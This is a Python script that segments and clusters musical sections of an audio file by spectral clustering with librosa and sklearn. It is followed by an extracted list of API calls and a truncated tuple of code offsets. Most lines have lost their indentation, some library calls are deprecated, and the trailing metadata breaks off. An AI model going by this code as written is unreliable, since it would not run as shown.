This implementation is available at https://librosa.github.io/librosa/auto_examples/plot_segmentation.html
Additional functions have been added to the core segmentation:
- unsupervised determination of the number of clusters suitable for the running task
- different feature packages: spectral, cepstral and chroma.
- a cosine distance between the different clusters that is plotted together with the cluster segmentation
- a set of parameters, reported in the params.py file, necessary for tuning the segmentation model.
usage:
python3 spectral_clustering_audio.py audiofilename.wav [.mp3]
Input:
- name of audio file to be analyzed
Output:
- Segmentation and grouping of the different musical sections synchronized on user-chosen onsets
- Optional plots of similarity and recurrence matrix
- Optional timestamps text file with parameters and time boundaries
"""
# Code source by <NAME> (2018) adapted from <NAME> (2014)
# License: ISC
###################################
# Imports
# - numpy for basic functionality
# - scipy for graph Laplacian
# - matplotlib for visualization
# - sklearn.cluster for K-Means, for metrics and scaling.
# - warnings to delete warning message for scipy package
from __future__ import division
import numpy as np
import scipy
import warnings
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
import sys, os
import argparse
import matplotlib.pyplot as plt
from matplotlib import gridspec
import sklearn.cluster
from sklearn.preprocessing import scale
import sklearn.metrics
import sklearn.utils
import librosa
import librosa.display
import cluster_rotate
import params
plt.rcParams.update({'font.size': 8})
BINS_PER_OCTAVE = params.BINS_PER_OCTAVE
N_OCTAVES = params.N_OCTAVES
NFFT = int(params.NFFT)
STEP = int(params.STEP)
#######################################
def detect_onsets(y, sr, M):
#detect onsets
oenv = librosa.onset.onset_strength(S=M, sr=sr)
# Detect events without backtracking
onset_raw = librosa.onset.onset_detect(onset_envelope=oenv, backtrack=False)
## Backtrack the events using the onset envelope
onset_bt = librosa.onset.onset_backtrack(onset_raw, oenv)
# we fix_frames to include non-beat frames 0 and C.shape[1] (final frame)
onset_frames = librosa.util.fix_frames(onset_raw, x_min=0, x_max=M.shape[1]-1)
onset_times = librosa.frames_to_time(onset_frames, sr=sr, hop_length = STEP)
# To reduce dimensionality, we'll beat-synchronous the CQT
Msync = librosa.util.sync(M, onset_raw, aggregate=np.median)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.plot(oenv, label='Onset strength')
plt.vlines(onset_raw, 0, oenv.max(), label='Raw onsets')
plt.vlines(onset_bt, 0, oenv.max(), label='Backtracked', color='r')
plt.legend(frameon=True, framealpha=0.75)
plt.tight_layout()
plt.figure(figsize=(12, 4))
plt.subplot(2,1,1)
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, hop_length= STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time')
plt.tight_layout()
plt.subplot(2,1,2)
plt.title('CQT spectrogram synchronized on onsets')
librosa.display.specshow(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis='cqt_hz', x_axis='time', x_coords=onset_times)
plt.tight_layout()
return onset_raw, onset_times, Msync
##############################################
def detect_beats(y, sr, M):
tempo, beats = librosa.beat.beat_track(y=y, sr=sr, hop_length = STEP, trim=False)
print('Detected tempo: {0:.2f} bpm'.format(tempo))
beat_period = np.diff(librosa.frames_to_time(beats, sr=sr, hop_length= STEP))
    print('mean beat period: {0:.2f} ; std beat period: {1:.2f}'.format(np.mean(beat_period), np.std(beat_period)))
beats_frames = librosa.util.fix_frames(beats, x_min=0, x_max=M.shape[1]-1)
beat_times = librosa.frames_to_time(beats_frames, sr=sr, hop_length = STEP)
Msync = librosa.util.sync(M, beats_frames, aggregate=np.median)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.subplot(2,1,1)
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, hop_length=STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time')
plt.tight_layout()
# For plotting purposes, we'll need the timing of the beats
# we fix_frames to include non-beat frames 0 and C.shape[1] (final frame)
plt.subplot(2,1,2)
plt.title('CQT spectrogram synchronized on beats')
librosa.display.specshow(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis='cqt_hz', x_axis='time', x_coords=beat_times)
plt.tight_layout()
return beats_frames, beat_times, Msync
##############################################
def no_onsets(sr, M):
onsets = np.arange(0, M.shape[1])
onset_times = librosa.samples_to_time(onsets, sr=sr/STEP)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, bins_per_octave=BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)
plt.tight_layout()
return onsets, onset_times, M
def get_manual_beats(sr, M, filename):
with open(filename, 'r') as f:
data = f.readlines()
times = np.array([float(x.strip()) for x in data[1:]])
frames = np.array([int(x * sr / STEP) for x in times])
onsets = librosa.util.fix_frames(frames, x_min=0, x_max=M.shape[1]-1)
onset_times = librosa.frames_to_time(onsets, sr=sr, hop_length = STEP)
Msync = librosa.util.sync(M, onsets, aggregate=np.median)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.subplot(2,1,1)
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, hop_length=STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time')
plt.tight_layout()
plt.subplot(2,1,2)
plt.title('CQT spectrogram synchronized on beats')
librosa.display.specshow(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis='cqt_hz', x_axis='time', x_coords=onset_times)
plt.tight_layout()
return onsets, onset_times, Msync
def extract_onsets(y, sr, manual_opt):
method = params.onset
#compute the CQT transform C: np.array((252, Tmax*sr/STEP))
C = librosa.amplitude_to_db(librosa.core.magphase(librosa.cqt(y=y, sr=sr, bins_per_octave=BINS_PER_OCTAVE, n_bins=N_OCTAVES * BINS_PER_OCTAVE, hop_length = STEP))[0], ref=np.max)
#to reduce dimensionality, we'll onset-synchronous the CQT
#onset is a vector of onset indexes np.array((N+1,)) including 0
#onset_times is a vector of onset times np.array((N+1,)) including 0
#Csync is the CQT transform synchronized on onsets np.array((252, N))
if method == 'no':
onset, onset_times, Csync = no_onsets(sr, C)
elif method == 'onset':
onset, onset_times, Csync = detect_onsets(y, sr, C)
elif method == 'beat':
onset, onset_times, Csync = detect_beats(y, sr, C)
elif method == 'manual':
onset, onset_times, Csync = get_manual_beats(sr, C, manual_opt)
else:
print('onset parameter is not well-defined')
sys.exit()
return onset, onset_times, Csync
def build_weighted_rec_matrix(M):
# Let's build a weighted recurrence affinity matrix using onset-synchronous CQT
# the similarity matrix is filtered to prevent linkage errors and fill the gaps
# the filter corresponds to a width=3 time window and a majority vote.
R = librosa.segment.recurrence_matrix(M, width=3, mode='affinity',sym=True)
# Enhance diagonals with a median filter
df = librosa.segment.timelag_filter(scipy.ndimage.median_filter)
Rf = df(R, size=(1, 7))
return Rf
def build_seq_matrix(M, x):
#build the sequence matrix using feature-similarity
    # R_path[i, i+/-1] = exp(-|M[i] - M[i+/-1]|^2 / sigma^2)
#synchronize features with onsets
Msync = librosa.util.sync(M, x, aggregate=np.median)
    #Msync = M  # no synchronization
#normalize (rescale) features between 0 and 1
Msync_normed = scale(Msync)
#constant scaling
path_distance = np.sum(np.diff(Msync_normed, axis=1)**2, axis=0)
#sigma is the median distance between successive beats/onsets.
sigma = np.median(path_distance)
path_sim = np.exp(-path_distance / sigma)
#local scaling from A Spectral Clustering Approach to Speaker Diarization, <NAME>, <NAME>, <NAME>, <NAME>
R_path = np.diag(path_sim, k=1) + np.diag(path_sim, k=-1)
return R_path
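# Illustrative sketch, not part of the original pipeline: the local path-similarity
# kernel used above, written out on a tiny synthetic feature matrix (omitting the
# onset synchronization and feature scaling steps of build_seq_matrix).
def _demo_path_similarity(n_frames=6, seed=0):
    rng = np.random.RandomState(seed)
    M = rng.rand(4, n_frames)                        # (n_features, n_frames)
    d = np.sum(np.diff(M, axis=1)**2, axis=0)       # squared distance between neighbours
    sim = np.exp(-d / np.median(d))                 # Gaussian kernel, median-scaled
    return np.diag(sim, k=1) + np.diag(sim, k=-1)  # banded R_path matrix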
def build_laplacian_and_evec(Rf, R_path, opt, onsets):
# And compute the balanced combination A of the two similarity matrices Rf and R_path
deg_path = np.sum(R_path, axis=1)
deg_rec = np.sum(Rf, axis=1)
mu = deg_path.dot(deg_path + deg_rec) / np.sum((deg_path + deg_rec)**2)
print('Optimal weight value (mu): {0:.2f}'.format(mu))
A = mu * Rf + (1 - mu) * R_path
# Plot the resulting graphs
if opt: plot_similarity(Rf, R_path, A, onsets)
# L: symetrized normalized Laplacian
L = scipy.sparse.csgraph.laplacian(A, normed=True)
# and its spectral decomposition (Find eigenvalues w and optionally eigenvectors v of matrix L)
evals, evecs = np.linalg.eigh(L)
print('L shape:', L.shape)
# We can clean this up further with a median filter.
# This can help smooth over small discontinuities
evecs = scipy.ndimage.median_filter(evecs, size=(9, 1))
# cumulative normalization is needed for symmetric normalize laplacian eigenvectors
Cnorm = np.cumsum(evecs**2, axis=1)**0.5
return Cnorm, evals, evecs
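# Illustrative sketch, not part of the original pipeline: build_laplacian_and_evec
# run on two small synthetic symmetric affinity matrices standing in for Rf and
# R_path, with plotting disabled; it only exercises the balanced combination and
# the eigendecomposition.
def _demo_laplacian(n=12, seed=0):
    rng = np.random.RandomState(seed)
    A_rec = rng.rand(n, n)
    A_rec = (A_rec + A_rec.T) / 2                      # stand-in for Rf
    np.fill_diagonal(A_rec, 0)
    path = rng.rand(n - 1)
    A_path = np.diag(path, k=1) + np.diag(path, k=-1)  # stand-in for R_path
    return build_laplacian_and_evec(A_rec, A_path, False, None)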
################################################
def compute_nb_clusters(method, evals, evecs, Tmax):
    if method == 'fixed':
        c = params.cluster_nb # list
    elif method == 'max':
        nc = []
        Cnorm = np.cumsum(evecs**2, axis=1)**0.5
        for it in range(params.cluster_max):
            nc.append(cluster_rotate.cluster_rotate(evecs/Cnorm, evals, range(1,10), 1, False))
        c = [int(np.mean(nc))+1]
    elif method == 'evals':
        ind = np.where(1- evals > 0.75)[0]
        #print(ind)
        return [len(ind) + 1]
    elif method in ['silhouette', 'davies_bouldin', 'calinski_harabaz']:
        list_k = range(2,50,2)
        Cnorm = np.cumsum(evecs**2, axis=1)**0.5 #cumulative norm of the eigenvectors
        score = []
        for k in list_k:
            print('nb of clusters:', k)
            X = evecs[:, :k] / Cnorm[:, k-1:k]
            # Let's use these k components to cluster beats into segments
            # (Algorithm 1)
            KM = sklearn.cluster.KMeans(n_clusters=k)
            seg_ids = KM.fit_predict(X)
            if method == 'silhouette':
                score.append(sklearn.metrics.silhouette_score(X, seg_ids, metric='euclidean')) #max (close to 1)
            elif method == 'davies_bouldin':
                score.append(davies_bouldin_score(X, seg_ids)) #min
            elif method == 'calinski_harabaz':
                score.append(sklearn.metrics.calinski_harabaz_score(X, seg_ids)) #max
        if method == 'davies_bouldin':
            return [list_k[np.argmin(score)]]
        else:
            return [list_k[np.argmax(score)]]
    else:
        print('method for finding the right number of clusters is unknown')
        sys.exit()
    print('nb of clusters:', c)
    return c
def davies_bouldin_score(X, labels):
"""Computes the Davies-Bouldin score.
The score is defined as the ratio of within-cluster distances to
between-cluster distances.
Read more in the :ref:`User Guide <davies-bouldin_index>`.
Parameters
----------
X : array-like, shape (``n_samples``, ``n_features``)
List of ``n_features``-dimensional data points. Each row corresponds
to a single data point.
labels : array-like, shape (``n_samples``,)
Predicted labels for each sample.
Returns
-------
score: float
The resulting Davies-Bouldin score.
References
----------
.. [1] `Davies, <NAME>.; Bouldin, <NAME>. (1979).
"A Cluster Separation Measure". IEEE Transactions on
Pattern Analysis and Machine Intelligence. PAMI-1 (2): 224-227`_
"""
X, labels = sklearn.utils.check_X_y(X, labels)
le = sklearn.preprocessing.LabelEncoder()
labels = le.fit_transform(labels)
n_samples, _ = X.shape
n_labels = len(le.classes_)
if not 1 < n_labels < n_samples:
raise ValueError("Number of labels is %d. Valid values are 2 to n_samples - 1 (inclusive)" % n_labels)
intra_dists = np.zeros(n_labels)
    centroids = np.zeros((n_labels, len(X[0])), dtype=float)
for k in range(n_labels):
cluster_k = sklearn.utils.safe_indexing(X, labels == k)
centroid = cluster_k.mean(axis=0)
centroids[k] = centroid
intra_dists[k] = np.average(sklearn.metrics.pairwise.pairwise_distances(cluster_k, [centroid]))
centroid_distances = sklearn.metrics.pairwise.pairwise_distances(centroids)
if np.allclose(intra_dists, 0) or np.allclose(centroid_distances, 0):
return 0.0
score = (intra_dists[:, None] + intra_dists) / centroid_distances
score[score == np.inf] = np.nan
return np.mean(np.nanmax(score, axis=1))
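# Illustrative sketch, not part of the original pipeline: davies_bouldin_score on
# two well-separated toy clusters; small values indicate compact, well-separated
# clusters, which is why this criterion is minimised when choosing k.
def _demo_davies_bouldin():
    X = np.array([[0.0, 0.0], [0.0, 1.0], [10.0, 10.0], [10.0, 11.0]])
    labels = np.array([0, 0, 1, 1])
    return davies_bouldin_score(X, labels)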
def plot_similarity(Rf, R_path, A, onset_times):
plt.figure(figsize=(12, 4))
plt.subplot(1, 3, 1)
librosa.display.specshow(Rf, cmap='inferno_r', y_axis='time', y_coords=onset_times)
plt.title('Long-range recurrence similarity (Rrec)')
plt.subplot(1, 3, 2)
librosa.display.specshow(R_path, cmap='inferno_r')
plt.title('Local path similarity (Rloc)')
plt.subplot(1, 3, 3)
librosa.display.specshow(A, cmap='inferno_r')
plt.title('Combined graph (A = m Rrec + (1-m) Rloc)')
plt.tight_layout()
def plot_structure(Rf, X, seg_ids, k, onset_times):
fig_s = plt.figure(figsize=(12, 4))
colors = plt.get_cmap('Paired', k)
ax_s1 = fig_s.add_subplot(1, 3, 2)
librosa.display.specshow(Rf, cmap='inferno_r')
ax_s1.set_title('Long-range recurrence similarity (Rrec)')
ax_s2 =fig_s.add_subplot(1, 3, 1)
librosa.display.specshow(X, y_axis='time', y_coords=onset_times)
ax_s2.set_title('Structure components (Eigen vectors)')
ax_s3 = fig_s.add_subplot(1, 3, 3)
librosa.display.specshow(np.atleast_2d(seg_ids).T, cmap=colors)
ax_s3.set_title('Estimated segments')
plt.colorbar(ticks=range(k))
plt.tight_layout()
#################################################
def compute_musical_density(C, onset_times, w, alpha):
N = C.shape[1]
density = []
for n in range(N):
t1 = np.min([onset_times[-1], onset_times[n] + w])
t2 = np.min([onset_times[-1] -w, onset_times[n]])
        idw = np.where((onset_times < t1) & (onset_times >= t2))[0]
#if n + w < :
threshold_chroma = np.max(C[:,idw])
#else:
#threshold_chroma = np.mean(C[:, N - w : N])
idx = np.where(C[:,n] > alpha * threshold_chroma)
density.append(len(idx[0]))
return density
def plot_features(X, onsets, onset_times):
Xsync = librosa.util.sync(X, onsets, aggregate=np.median)
#print(X.shape, Xsync.shape)
#print(onset_times)
if params.feat[0] == 'chroma':
fig_c = plt.figure(figsize=(12, 6))
ax0_c = fig_c.add_subplot(3,1,1)
ax0_c.set_title('onset-synchronous chroma (12)')
#ax0_c.pcolor(distance, cmap = 'plasma')
librosa.display.specshow(Xsync[:12,:], y_axis='chroma', x_axis='time', x_coords=onset_times, cmap = 'OrRd')
#plt.colorbar()
ax1_c = fig_c.add_subplot(3,1,2, sharex = ax0_c)
ax1_c.set_title('onset-synchronous delta chroma (12)')
librosa.display.specshow(np.abs(Xsync[12:,:]), y_axis='chroma', x_axis='time', x_coords=onset_times, cmap = 'OrRd')
#plt.colorbar()
density = compute_musical_density(Xsync[:12,:], onset_times, params.norm_density_win, params.alpha)
print(len(onset_times), len(density))
ax2_c = fig_c.add_subplot(3,1,3, sharex = ax0_c)
ax2_c.set_title('musical density')
ax2_c.plot(onset_times, density)
plt.tight_layout()
elif params.feat[0] == 'cepstral':
fig_s = plt.figure(figsize=(12, 6))
ax0_s = fig_s.add_subplot(3,1,1)
ax0_s.set_title('onset-synchronous MFCC (20)')
        librosa.display.specshow(Xsync[:20,:], x_axis='time', x_coords=onset_times)
        #plt.colorbar()
        #plt.tight_layout()
        ax1_s = fig_s.add_subplot(3,1,2, sharex = ax0_s)
        ax1_s.set_title('onset-synchronous delta MFCC (20)')
        librosa.display.specshow(np.abs(Xsync[20:,:]), x_axis='time', x_coords=onset_times)
        #plt.colorbar()
        density = compute_musical_density(Xsync[:20,:], onset_times, params.norm_density_win, params.alpha)
        ax2_s = fig_s.add_subplot(3,1,3, sharex = ax0_s)
ax2_s.set_title('musical density')
ax2_s.plot(onset_times, density)
plt.tight_layout()
else:
print('these parameters can not be plot')
def load_wav_percu(filename, start, duration, opt_percussive_part):
y, sr = librosa.load(filename, offset=start, duration = duration)
if opt_percussive_part:
        # separate harmonics and percussives into two waveforms
        y_harmo, y_percu = librosa.effects.hpss(y)
        librosa.output.write_wav(filename + '_harmo.wav', y_harmo, sr)
        librosa.output.write_wav(filename + '_percu.wav', y_percu, sr)
        return y_percu, sr
else:
return y, sr
################################################
def feature_extraction(y, sr, opt_tuning):
if opt_tuning:
#extraction of tuning
A440 = librosa.estimate_tuning(y=y, sr=sr, resolution=1e-3)
print('Deviation from A440 is : {0:.2f}'.format(A440))
else:
A440 = 0.0
print('Features for local similarity: ', ' '.join(params.feat))
full = []
idx_chroma = 0
if 'cepstral' in params.feat:
mfcc = librosa.feature.mfcc(y=y, sr=sr, n_mfcc = 20, n_fft = NFFT, hop_length = STEP)
mfcc_delta = librosa.feature.delta(mfcc)
fcep = np.concatenate((mfcc, mfcc_delta), axis=0)
full.append(fcep)
if 'chroma' in params.feat:
chroma = librosa.feature.chroma_cqt(y=y, sr=sr, n_chroma = 12, n_octaves = N_OCTAVES, hop_length = STEP, norm = None, tuning= A440)
chroma_delta = librosa.feature.delta(chroma)
fchr = np.concatenate((chroma, chroma_delta), axis=0)
idx_chroma = len(full)
full.append(fchr)
if 'spectral' in params.feat:
centroid = librosa.feature.spectral_centroid(y=y, sr=sr, n_fft = NFFT, hop_length = STEP)
contrast = librosa.feature.spectral_contrast(y=y, sr=sr, n_fft = NFFT, n_bands=6, hop_length = STEP)
flatness = librosa.feature.spectral_flatness(y=y, n_fft = NFFT, hop_length = STEP)
rolloff05 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.05)
rolloff25 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.25)
rolloff50 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.50)
rolloff75 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.75)
rolloff95 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.95)
spec = np.concatenate((centroid, contrast, flatness, rolloff05,rolloff25,rolloff50,rolloff75,rolloff95), axis=0)
spec_delta = librosa.feature.delta(spec)
fspec = np.concatenate((spec, spec_delta), axis = 0)
full.append(fspec)
full = np.array(full)[0]
print('feature shape', full.shape)
return full, idx_chroma
def extract_time_boundaries(cluster_ids, onsets, nb_frames, sr):
# Locate segment boundaries from the label sequence
bound_beats = 1 + np.flatnonzero(cluster_ids[:-1] != cluster_ids[1:])
# Count beat 0 as a boundary
bound_beats = librosa.util.fix_frames(bound_beats, x_min=0)
# Compute the segment label for each boundary
bound_labels = list(cluster_ids[bound_beats])
# Convert beat indices to frames
bound_frames = onsets[bound_beats]
# Make sure we cover to the end of the track
bound_frames = librosa.util.fix_frames(bound_frames, x_min=None, x_max=nb_frames-1)
bound_times = librosa.frames_to_time(bound_frames, sr=sr, hop_length = STEP)
return bound_times, bound_labels
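# Illustrative sketch, not part of the original pipeline: extract_time_boundaries
# on a toy label sequence; boundaries appear wherever consecutive onsets change
# cluster, and the final frame is always appended.
def _demo_time_boundaries(sr=22050):
    cluster_ids = np.array([0, 0, 1, 1, 2])
    onsets = np.array([0, 10, 20, 30, 40])
    return extract_time_boundaries(cluster_ids, onsets, nb_frames=50, sr=sr)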
##################################
def extract_cosine_distance_clusters(center_clusters, distance_ref, type_dist = 'cos'):
distance = []
for center in center_clusters:
if type_dist == 'cos':
distance.append( scipy.spatial.distance.cosine( center, distance_ref) )
elif type_dist == 'eucl':
distance.append(np.sqrt( np.sum( (center - distance_ref)**2) ))
return distance
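# Illustrative sketch, not part of the original pipeline: cosine distance between
# two toy cluster centres and a reference vector (0 = same direction, 1 = orthogonal),
# which is how the per-cluster distance curve should be read.
def _demo_cosine_distance():
    centers = np.array([[1.0, 0.0], [0.0, 1.0]])
    reference = np.array([1.0, 0.0])
    return extract_cosine_distance_clusters(centers, reference, type_dist='cos')  # -> [0.0, 1.0]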
def extract_distance_between_clusters(center_clusters, type_dist = 'cos'):
    distance = np.zeros((center_clusters.shape[0], center_clusters.shape[0]))
for i, center_i in enumerate(center_clusters):
for j, center_j in enumerate(center_clusters):
if type_dist == 'cos':
distance[i,j] = scipy.spatial.distance.cosine( center_i, center_j)
elif type_dist == 'eucl':
distance[i,j] = np.sqrt( np.sum( (center_i - center_j)**2) )
x = range(i+1)
y = range(j+1)
xloc = [c + 0.5 for c in x]
cx = [str(c) for c in x]
#print(cx)
fig_d, ax_d = plt.subplots(figsize=(5, 4))
p_d = ax_d.pcolor(distance, cmap = 'inferno_r')
cb = fig_d.colorbar(p_d)
ax_d.xaxis.set_ticks(xloc)
ax_d.xaxis.set_ticklabels(cx)
ax_d.yaxis.set_ticks(xloc)
ax_d.yaxis.set_ticklabels(cx)
ax_d.set_title('Distance between clusters')
ax_d.set_xlabel('clusters numbers')
plt.tight_layout()
return distance
def extract_ref_signal(X, onset_times):
    ind = np.where((onset_times >= params.begin_ref) & (onset_times < params.end_ref))[0]
    return X[ind, :]
def main():
parser = argparse.ArgumentParser(description='Segmentation and clustering of musical sections with spectral clustering (Laplacian matrix and eigen values)')
parser.add_argument('filename', type=str, help='name of audio file')
parser.add_argument('manual_onset', nargs='?', type=str, help='name of the file containing manual annotations for onset timestamps (with method=manual)')
args = parser.parse_args()
#==================
# Signal processing
#==================
#extract waveform from audio signal of given duration and begining. If onset_percu is True, extract only percussive part of the signal.
y, sr = load_wav_percu(args.filename, params.begin, params.duration, params.onset_percu)
print('signal shape:', y.shape, ' sr=', sr, 'win duration=%.2f' %(NFFT / sr))
#extract acoustic feature from audio signal feat is a matrix np.array((nb features, Tmax*sr/STEP))
feat, idx_chroma = feature_extraction(y, sr, params.opt_tuning)
#extract onset indexes and times + onset-synchronous CQT transform on onsets.
onsets, onset_times, Csync = extract_onsets(y, sr, args.manual_onset)
#if 'chroma' in params.feat:
# compute_musical_density(Csync, onset_times, idx_chroma, params.norm_density_win, params.alpha, sr)
if params.plot_features: plot_features(feat, onsets, onset_times)
#================
# Affinity matrix
#================
#compute a non-negative affinity matrix using onset-synchronous CQT (with Gaussian kernel)
#represent local consistency of timbral (CQT) features
Rf = build_weighted_rec_matrix(Csync)
#compute a non-negative affinity matrix using onset-synchronous feature matrix (with Gaussian kernel)
#represent long-range repeating forms of harmonic features
R_path = build_seq_matrix(feat, onsets)
#compute Laplacian (sequence augmented affinity matrix) as a linear combination of Rf and Rpath and extract eigenvalues and vectors.
Cnorm, evals, evecs = build_laplacian_and_evec(Rf, R_path, params.plot_simi, onset_times)
#===========
# Clustering
#===========
#determine number of clusters kl is a list of potential numbers of cluster.
    kl = compute_nb_clusters(params.cluster_method, evals, evecs, y.shape[0] / sr)
N_CLUST = len(kl)
#=================
# Start plotting
#=================
import matplotlib.patches as patches
fig_f = plt.figure(figsize = (12, 3+2*N_CLUST))
#fig.subplots_adjust(hspace=.5)
#plot onset-synchronous CQT
hr = [1] * (N_CLUST +1)
hr[0] = 2
gs = gridspec.GridSpec(1 + N_CLUST,1, height_ratios=hr)
ax_f0 = fig_f.add_subplot(gs[0])
librosa.display.specshow(Csync, y_axis='cqt_hz', sr=sr, hop_length = STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)
#librosa.display.specshow(feat, y_axis='chroma', x_axis='time') #ou
ax_f0.set_title('CQT spectrogram synchronized {0}'.format(params.onset))
for it, k in enumerate(kl):
#limit the number of clusters per second
        if k > params.cluster_nb_max * y.shape[0] / sr:
            k = int(params.cluster_nb_max * y.shape[0] / sr)
print('nb of clusters: {} for it {}/{}'.format(k, it, N_CLUST))
#for k clusters, use the first k normalized eigenvectors.
#X can be interpretable as an onset-synchronous matrix containing relevant feature information for local and log-range structure segmentation
X = evecs[:, :k] / Cnorm[:, k-1:k]
#onsets are grouped into k clusters, each cluster having its own acoustic characteristics
KM = sklearn.cluster.KMeans(n_clusters=k)
#seg_ids is a np.array((label)) label being a number corresponding to one cluster seg_ids[i] is the label of onset i
seg_ids = KM.fit_predict(X)
        #if needed compute the cosine distance between each cluster and a reference taken at the very beginning of the signal
#KM.cluster_centers_ : array, [n_clusters, n_features]
if params.cluster_dist:
ref_signal = extract_ref_signal(X, onset_times)
            distance_cosine_cluster = extract_cosine_distance_clusters(KM.cluster_centers_, np.mean(ref_signal, axis=0))
else:
distance_cosine_cluster = None
if params.plot_dist:
distance_between_clusters = extract_distance_between_clusters( KM.cluster_centers_ )
# and plot the resulting structure representation
if params.plot_struct: plot_structure(Rf, X, seg_ids, k, onset_times)
bound_times, bound_labels = extract_time_boundaries(seg_ids, onsets, feat.shape[1], sr)
freqs = librosa.cqt_frequencies(n_bins=Csync.shape[0], fmin=librosa.note_to_hz('C1'), bins_per_octave=BINS_PER_OCTAVE)
timestamps_name = os.path.splitext(args.filename)[0] + '_timestamps.txt'
#=============
# Plot results
#=============
cmap = plt.get_cmap('Paired', k)
#write header of text file with parameters.
if params.timestamps:
f = open(timestamps_name, 'a')
f.write('WIN = {0:.2f} sec, NFFT = {1}, STEP = {2}, begin = {3}, duration = {4}\n'.format(NFFT / sr, NFFT, STEP, params.begin, params.duration))
f.write('Nb of clusters: {0} obtained with method {1} and features {2}\n'.format(k, params.cluster_method, '-'.join(params.feat)))
#plot onset-synchronous CQT
#if it == 0:
#plot segmentation and clusters grouping (+ cosine distance.)
#also write obtained boundaries in the text file.
ax_f1 = fig_f.add_subplot(gs[it + 1], sharex = ax_f0)
for interval, label in zip(zip(bound_times, bound_times[1:]), bound_labels):
if params.timestamps: f.write('{0:.2f} \t {1:.2f} \t {2} \n'.format(interval[0], interval[1], label))
if params.cluster_dist: ax_f1.plot([interval[0], interval[1]],[distance_cosine_cluster[label], distance_cosine_cluster[label]], 'k')
ax_f1.add_patch(patches.Rectangle((interval[0], 0), interval[1] - interval[0], 1, facecolor=cmap(label), alpha=1))
ax_f1.text(interval[0]+(interval[1]-interval[0])/2, 0.9, label, fontsize=8)
if params.timestamps: f.close()
#plt.subplots_adjust(hspace=.0)
plt.tight_layout()
plt.show()
if __name__ == '__main__':
main()
# Manual test snippet kept commented out: `load` is not defined in this module and
# main() parses its arguments from the command line.
# title = 'Palestrina'
# Palestrina, AccordsMajeurs, AccordsMineur, Majeur3et4notes, Majeur3et4notes, Accords3Notes, DispoMajeurMineur, Tension
# Cadence3V, Cadence4VMaj, Cadence4Vmin,
# audio = load('/Users/manuel/Dropbox (TMG)/Thèse/code/DescripteursHarmoniquesAudio/'+title+'.wav')
# main(audio)
|
[
"librosa.feature.spectral_flatness",
"librosa.util.fix_frames",
"librosa.feature.mfcc",
"librosa.estimate_tuning",
"numpy.array",
"numpy.cumsum",
"sys.exit",
"librosa.onset.onset_backtrack",
"librosa.feature.spectral_centroid",
"librosa.feature.spectral_contrast",
"numpy.arange",
"librosa.load",
"numpy.atleast_2d",
"numpy.mean",
"scipy.spatial.distance.cosine",
"argparse.ArgumentParser",
"numpy.where",
"matplotlib.pyplot.plot",
"numpy.flatnonzero",
"numpy.diff",
"numpy.max",
"numpy.exp",
"librosa.frames_to_time",
"matplotlib.gridspec.GridSpec",
"numpy.nanmax",
"numpy.concatenate",
"librosa.display.specshow",
"numpy.linalg.eigh",
"numpy.min",
"librosa.feature.spectral_rolloff",
"numpy.argmin",
"librosa.util.sync",
"librosa.segment.timelag_filter",
"librosa.effects.hpss",
"numpy.abs",
"numpy.allclose",
"librosa.onset.onset_detect",
"librosa.beat.beat_track",
"os.path.splitext",
"numpy.argmax",
"numpy.std",
"matplotlib.pyplot.title",
"librosa.note_to_hz",
"warnings.filterwarnings",
"sklearn.preprocessing.scale",
"matplotlib.pyplot.get_cmap",
"librosa.onset.onset_strength",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"numpy.median",
"librosa.output.write_wav",
"scipy.sparse.csgraph.laplacian",
"librosa.feature.delta",
"librosa.feature.chroma_cqt",
"numpy.diag",
"librosa.cqt",
"matplotlib.pyplot.rcParams.update",
"librosa.segment.recurrence_matrix",
"numpy.sum",
"numpy.zeros",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.tight_layout",
"scipy.ndimage.median_filter",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.subplots",
"librosa.samples_to_time"
] |
[((1598, 1686), 'warnings.filterwarnings', 'warnings.filterwarnings', ([], {'action': '"""ignore"""', 'module': '"""scipy"""', 'message': '"""^internal gelsd"""'}), "(action='ignore', module='scipy', message=\n '^internal gelsd')\n", (1621, 1686), False, 'import warnings\n'), ((1963, 2000), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'font.size': 8}"], {}), "({'font.size': 8})\n", (1982, 2000), True, 'import matplotlib.pyplot as plt\n'), ((2216, 2256), 'librosa.onset.onset_strength', 'librosa.onset.onset_strength', ([], {'S': 'M', 'sr': 'sr'}), '(S=M, sr=sr)\n', (2244, 2256), False, 'import librosa\n'), ((2308, 2372), 'librosa.onset.onset_detect', 'librosa.onset.onset_detect', ([], {'onset_envelope': 'oenv', 'backtrack': '(False)'}), '(onset_envelope=oenv, backtrack=False)\n', (2334, 2372), False, 'import librosa\n'), ((2435, 2481), 'librosa.onset.onset_backtrack', 'librosa.onset.onset_backtrack', (['onset_raw', 'oenv'], {}), '(onset_raw, oenv)\n', (2464, 2481), False, 'import librosa\n'), ((2573, 2638), 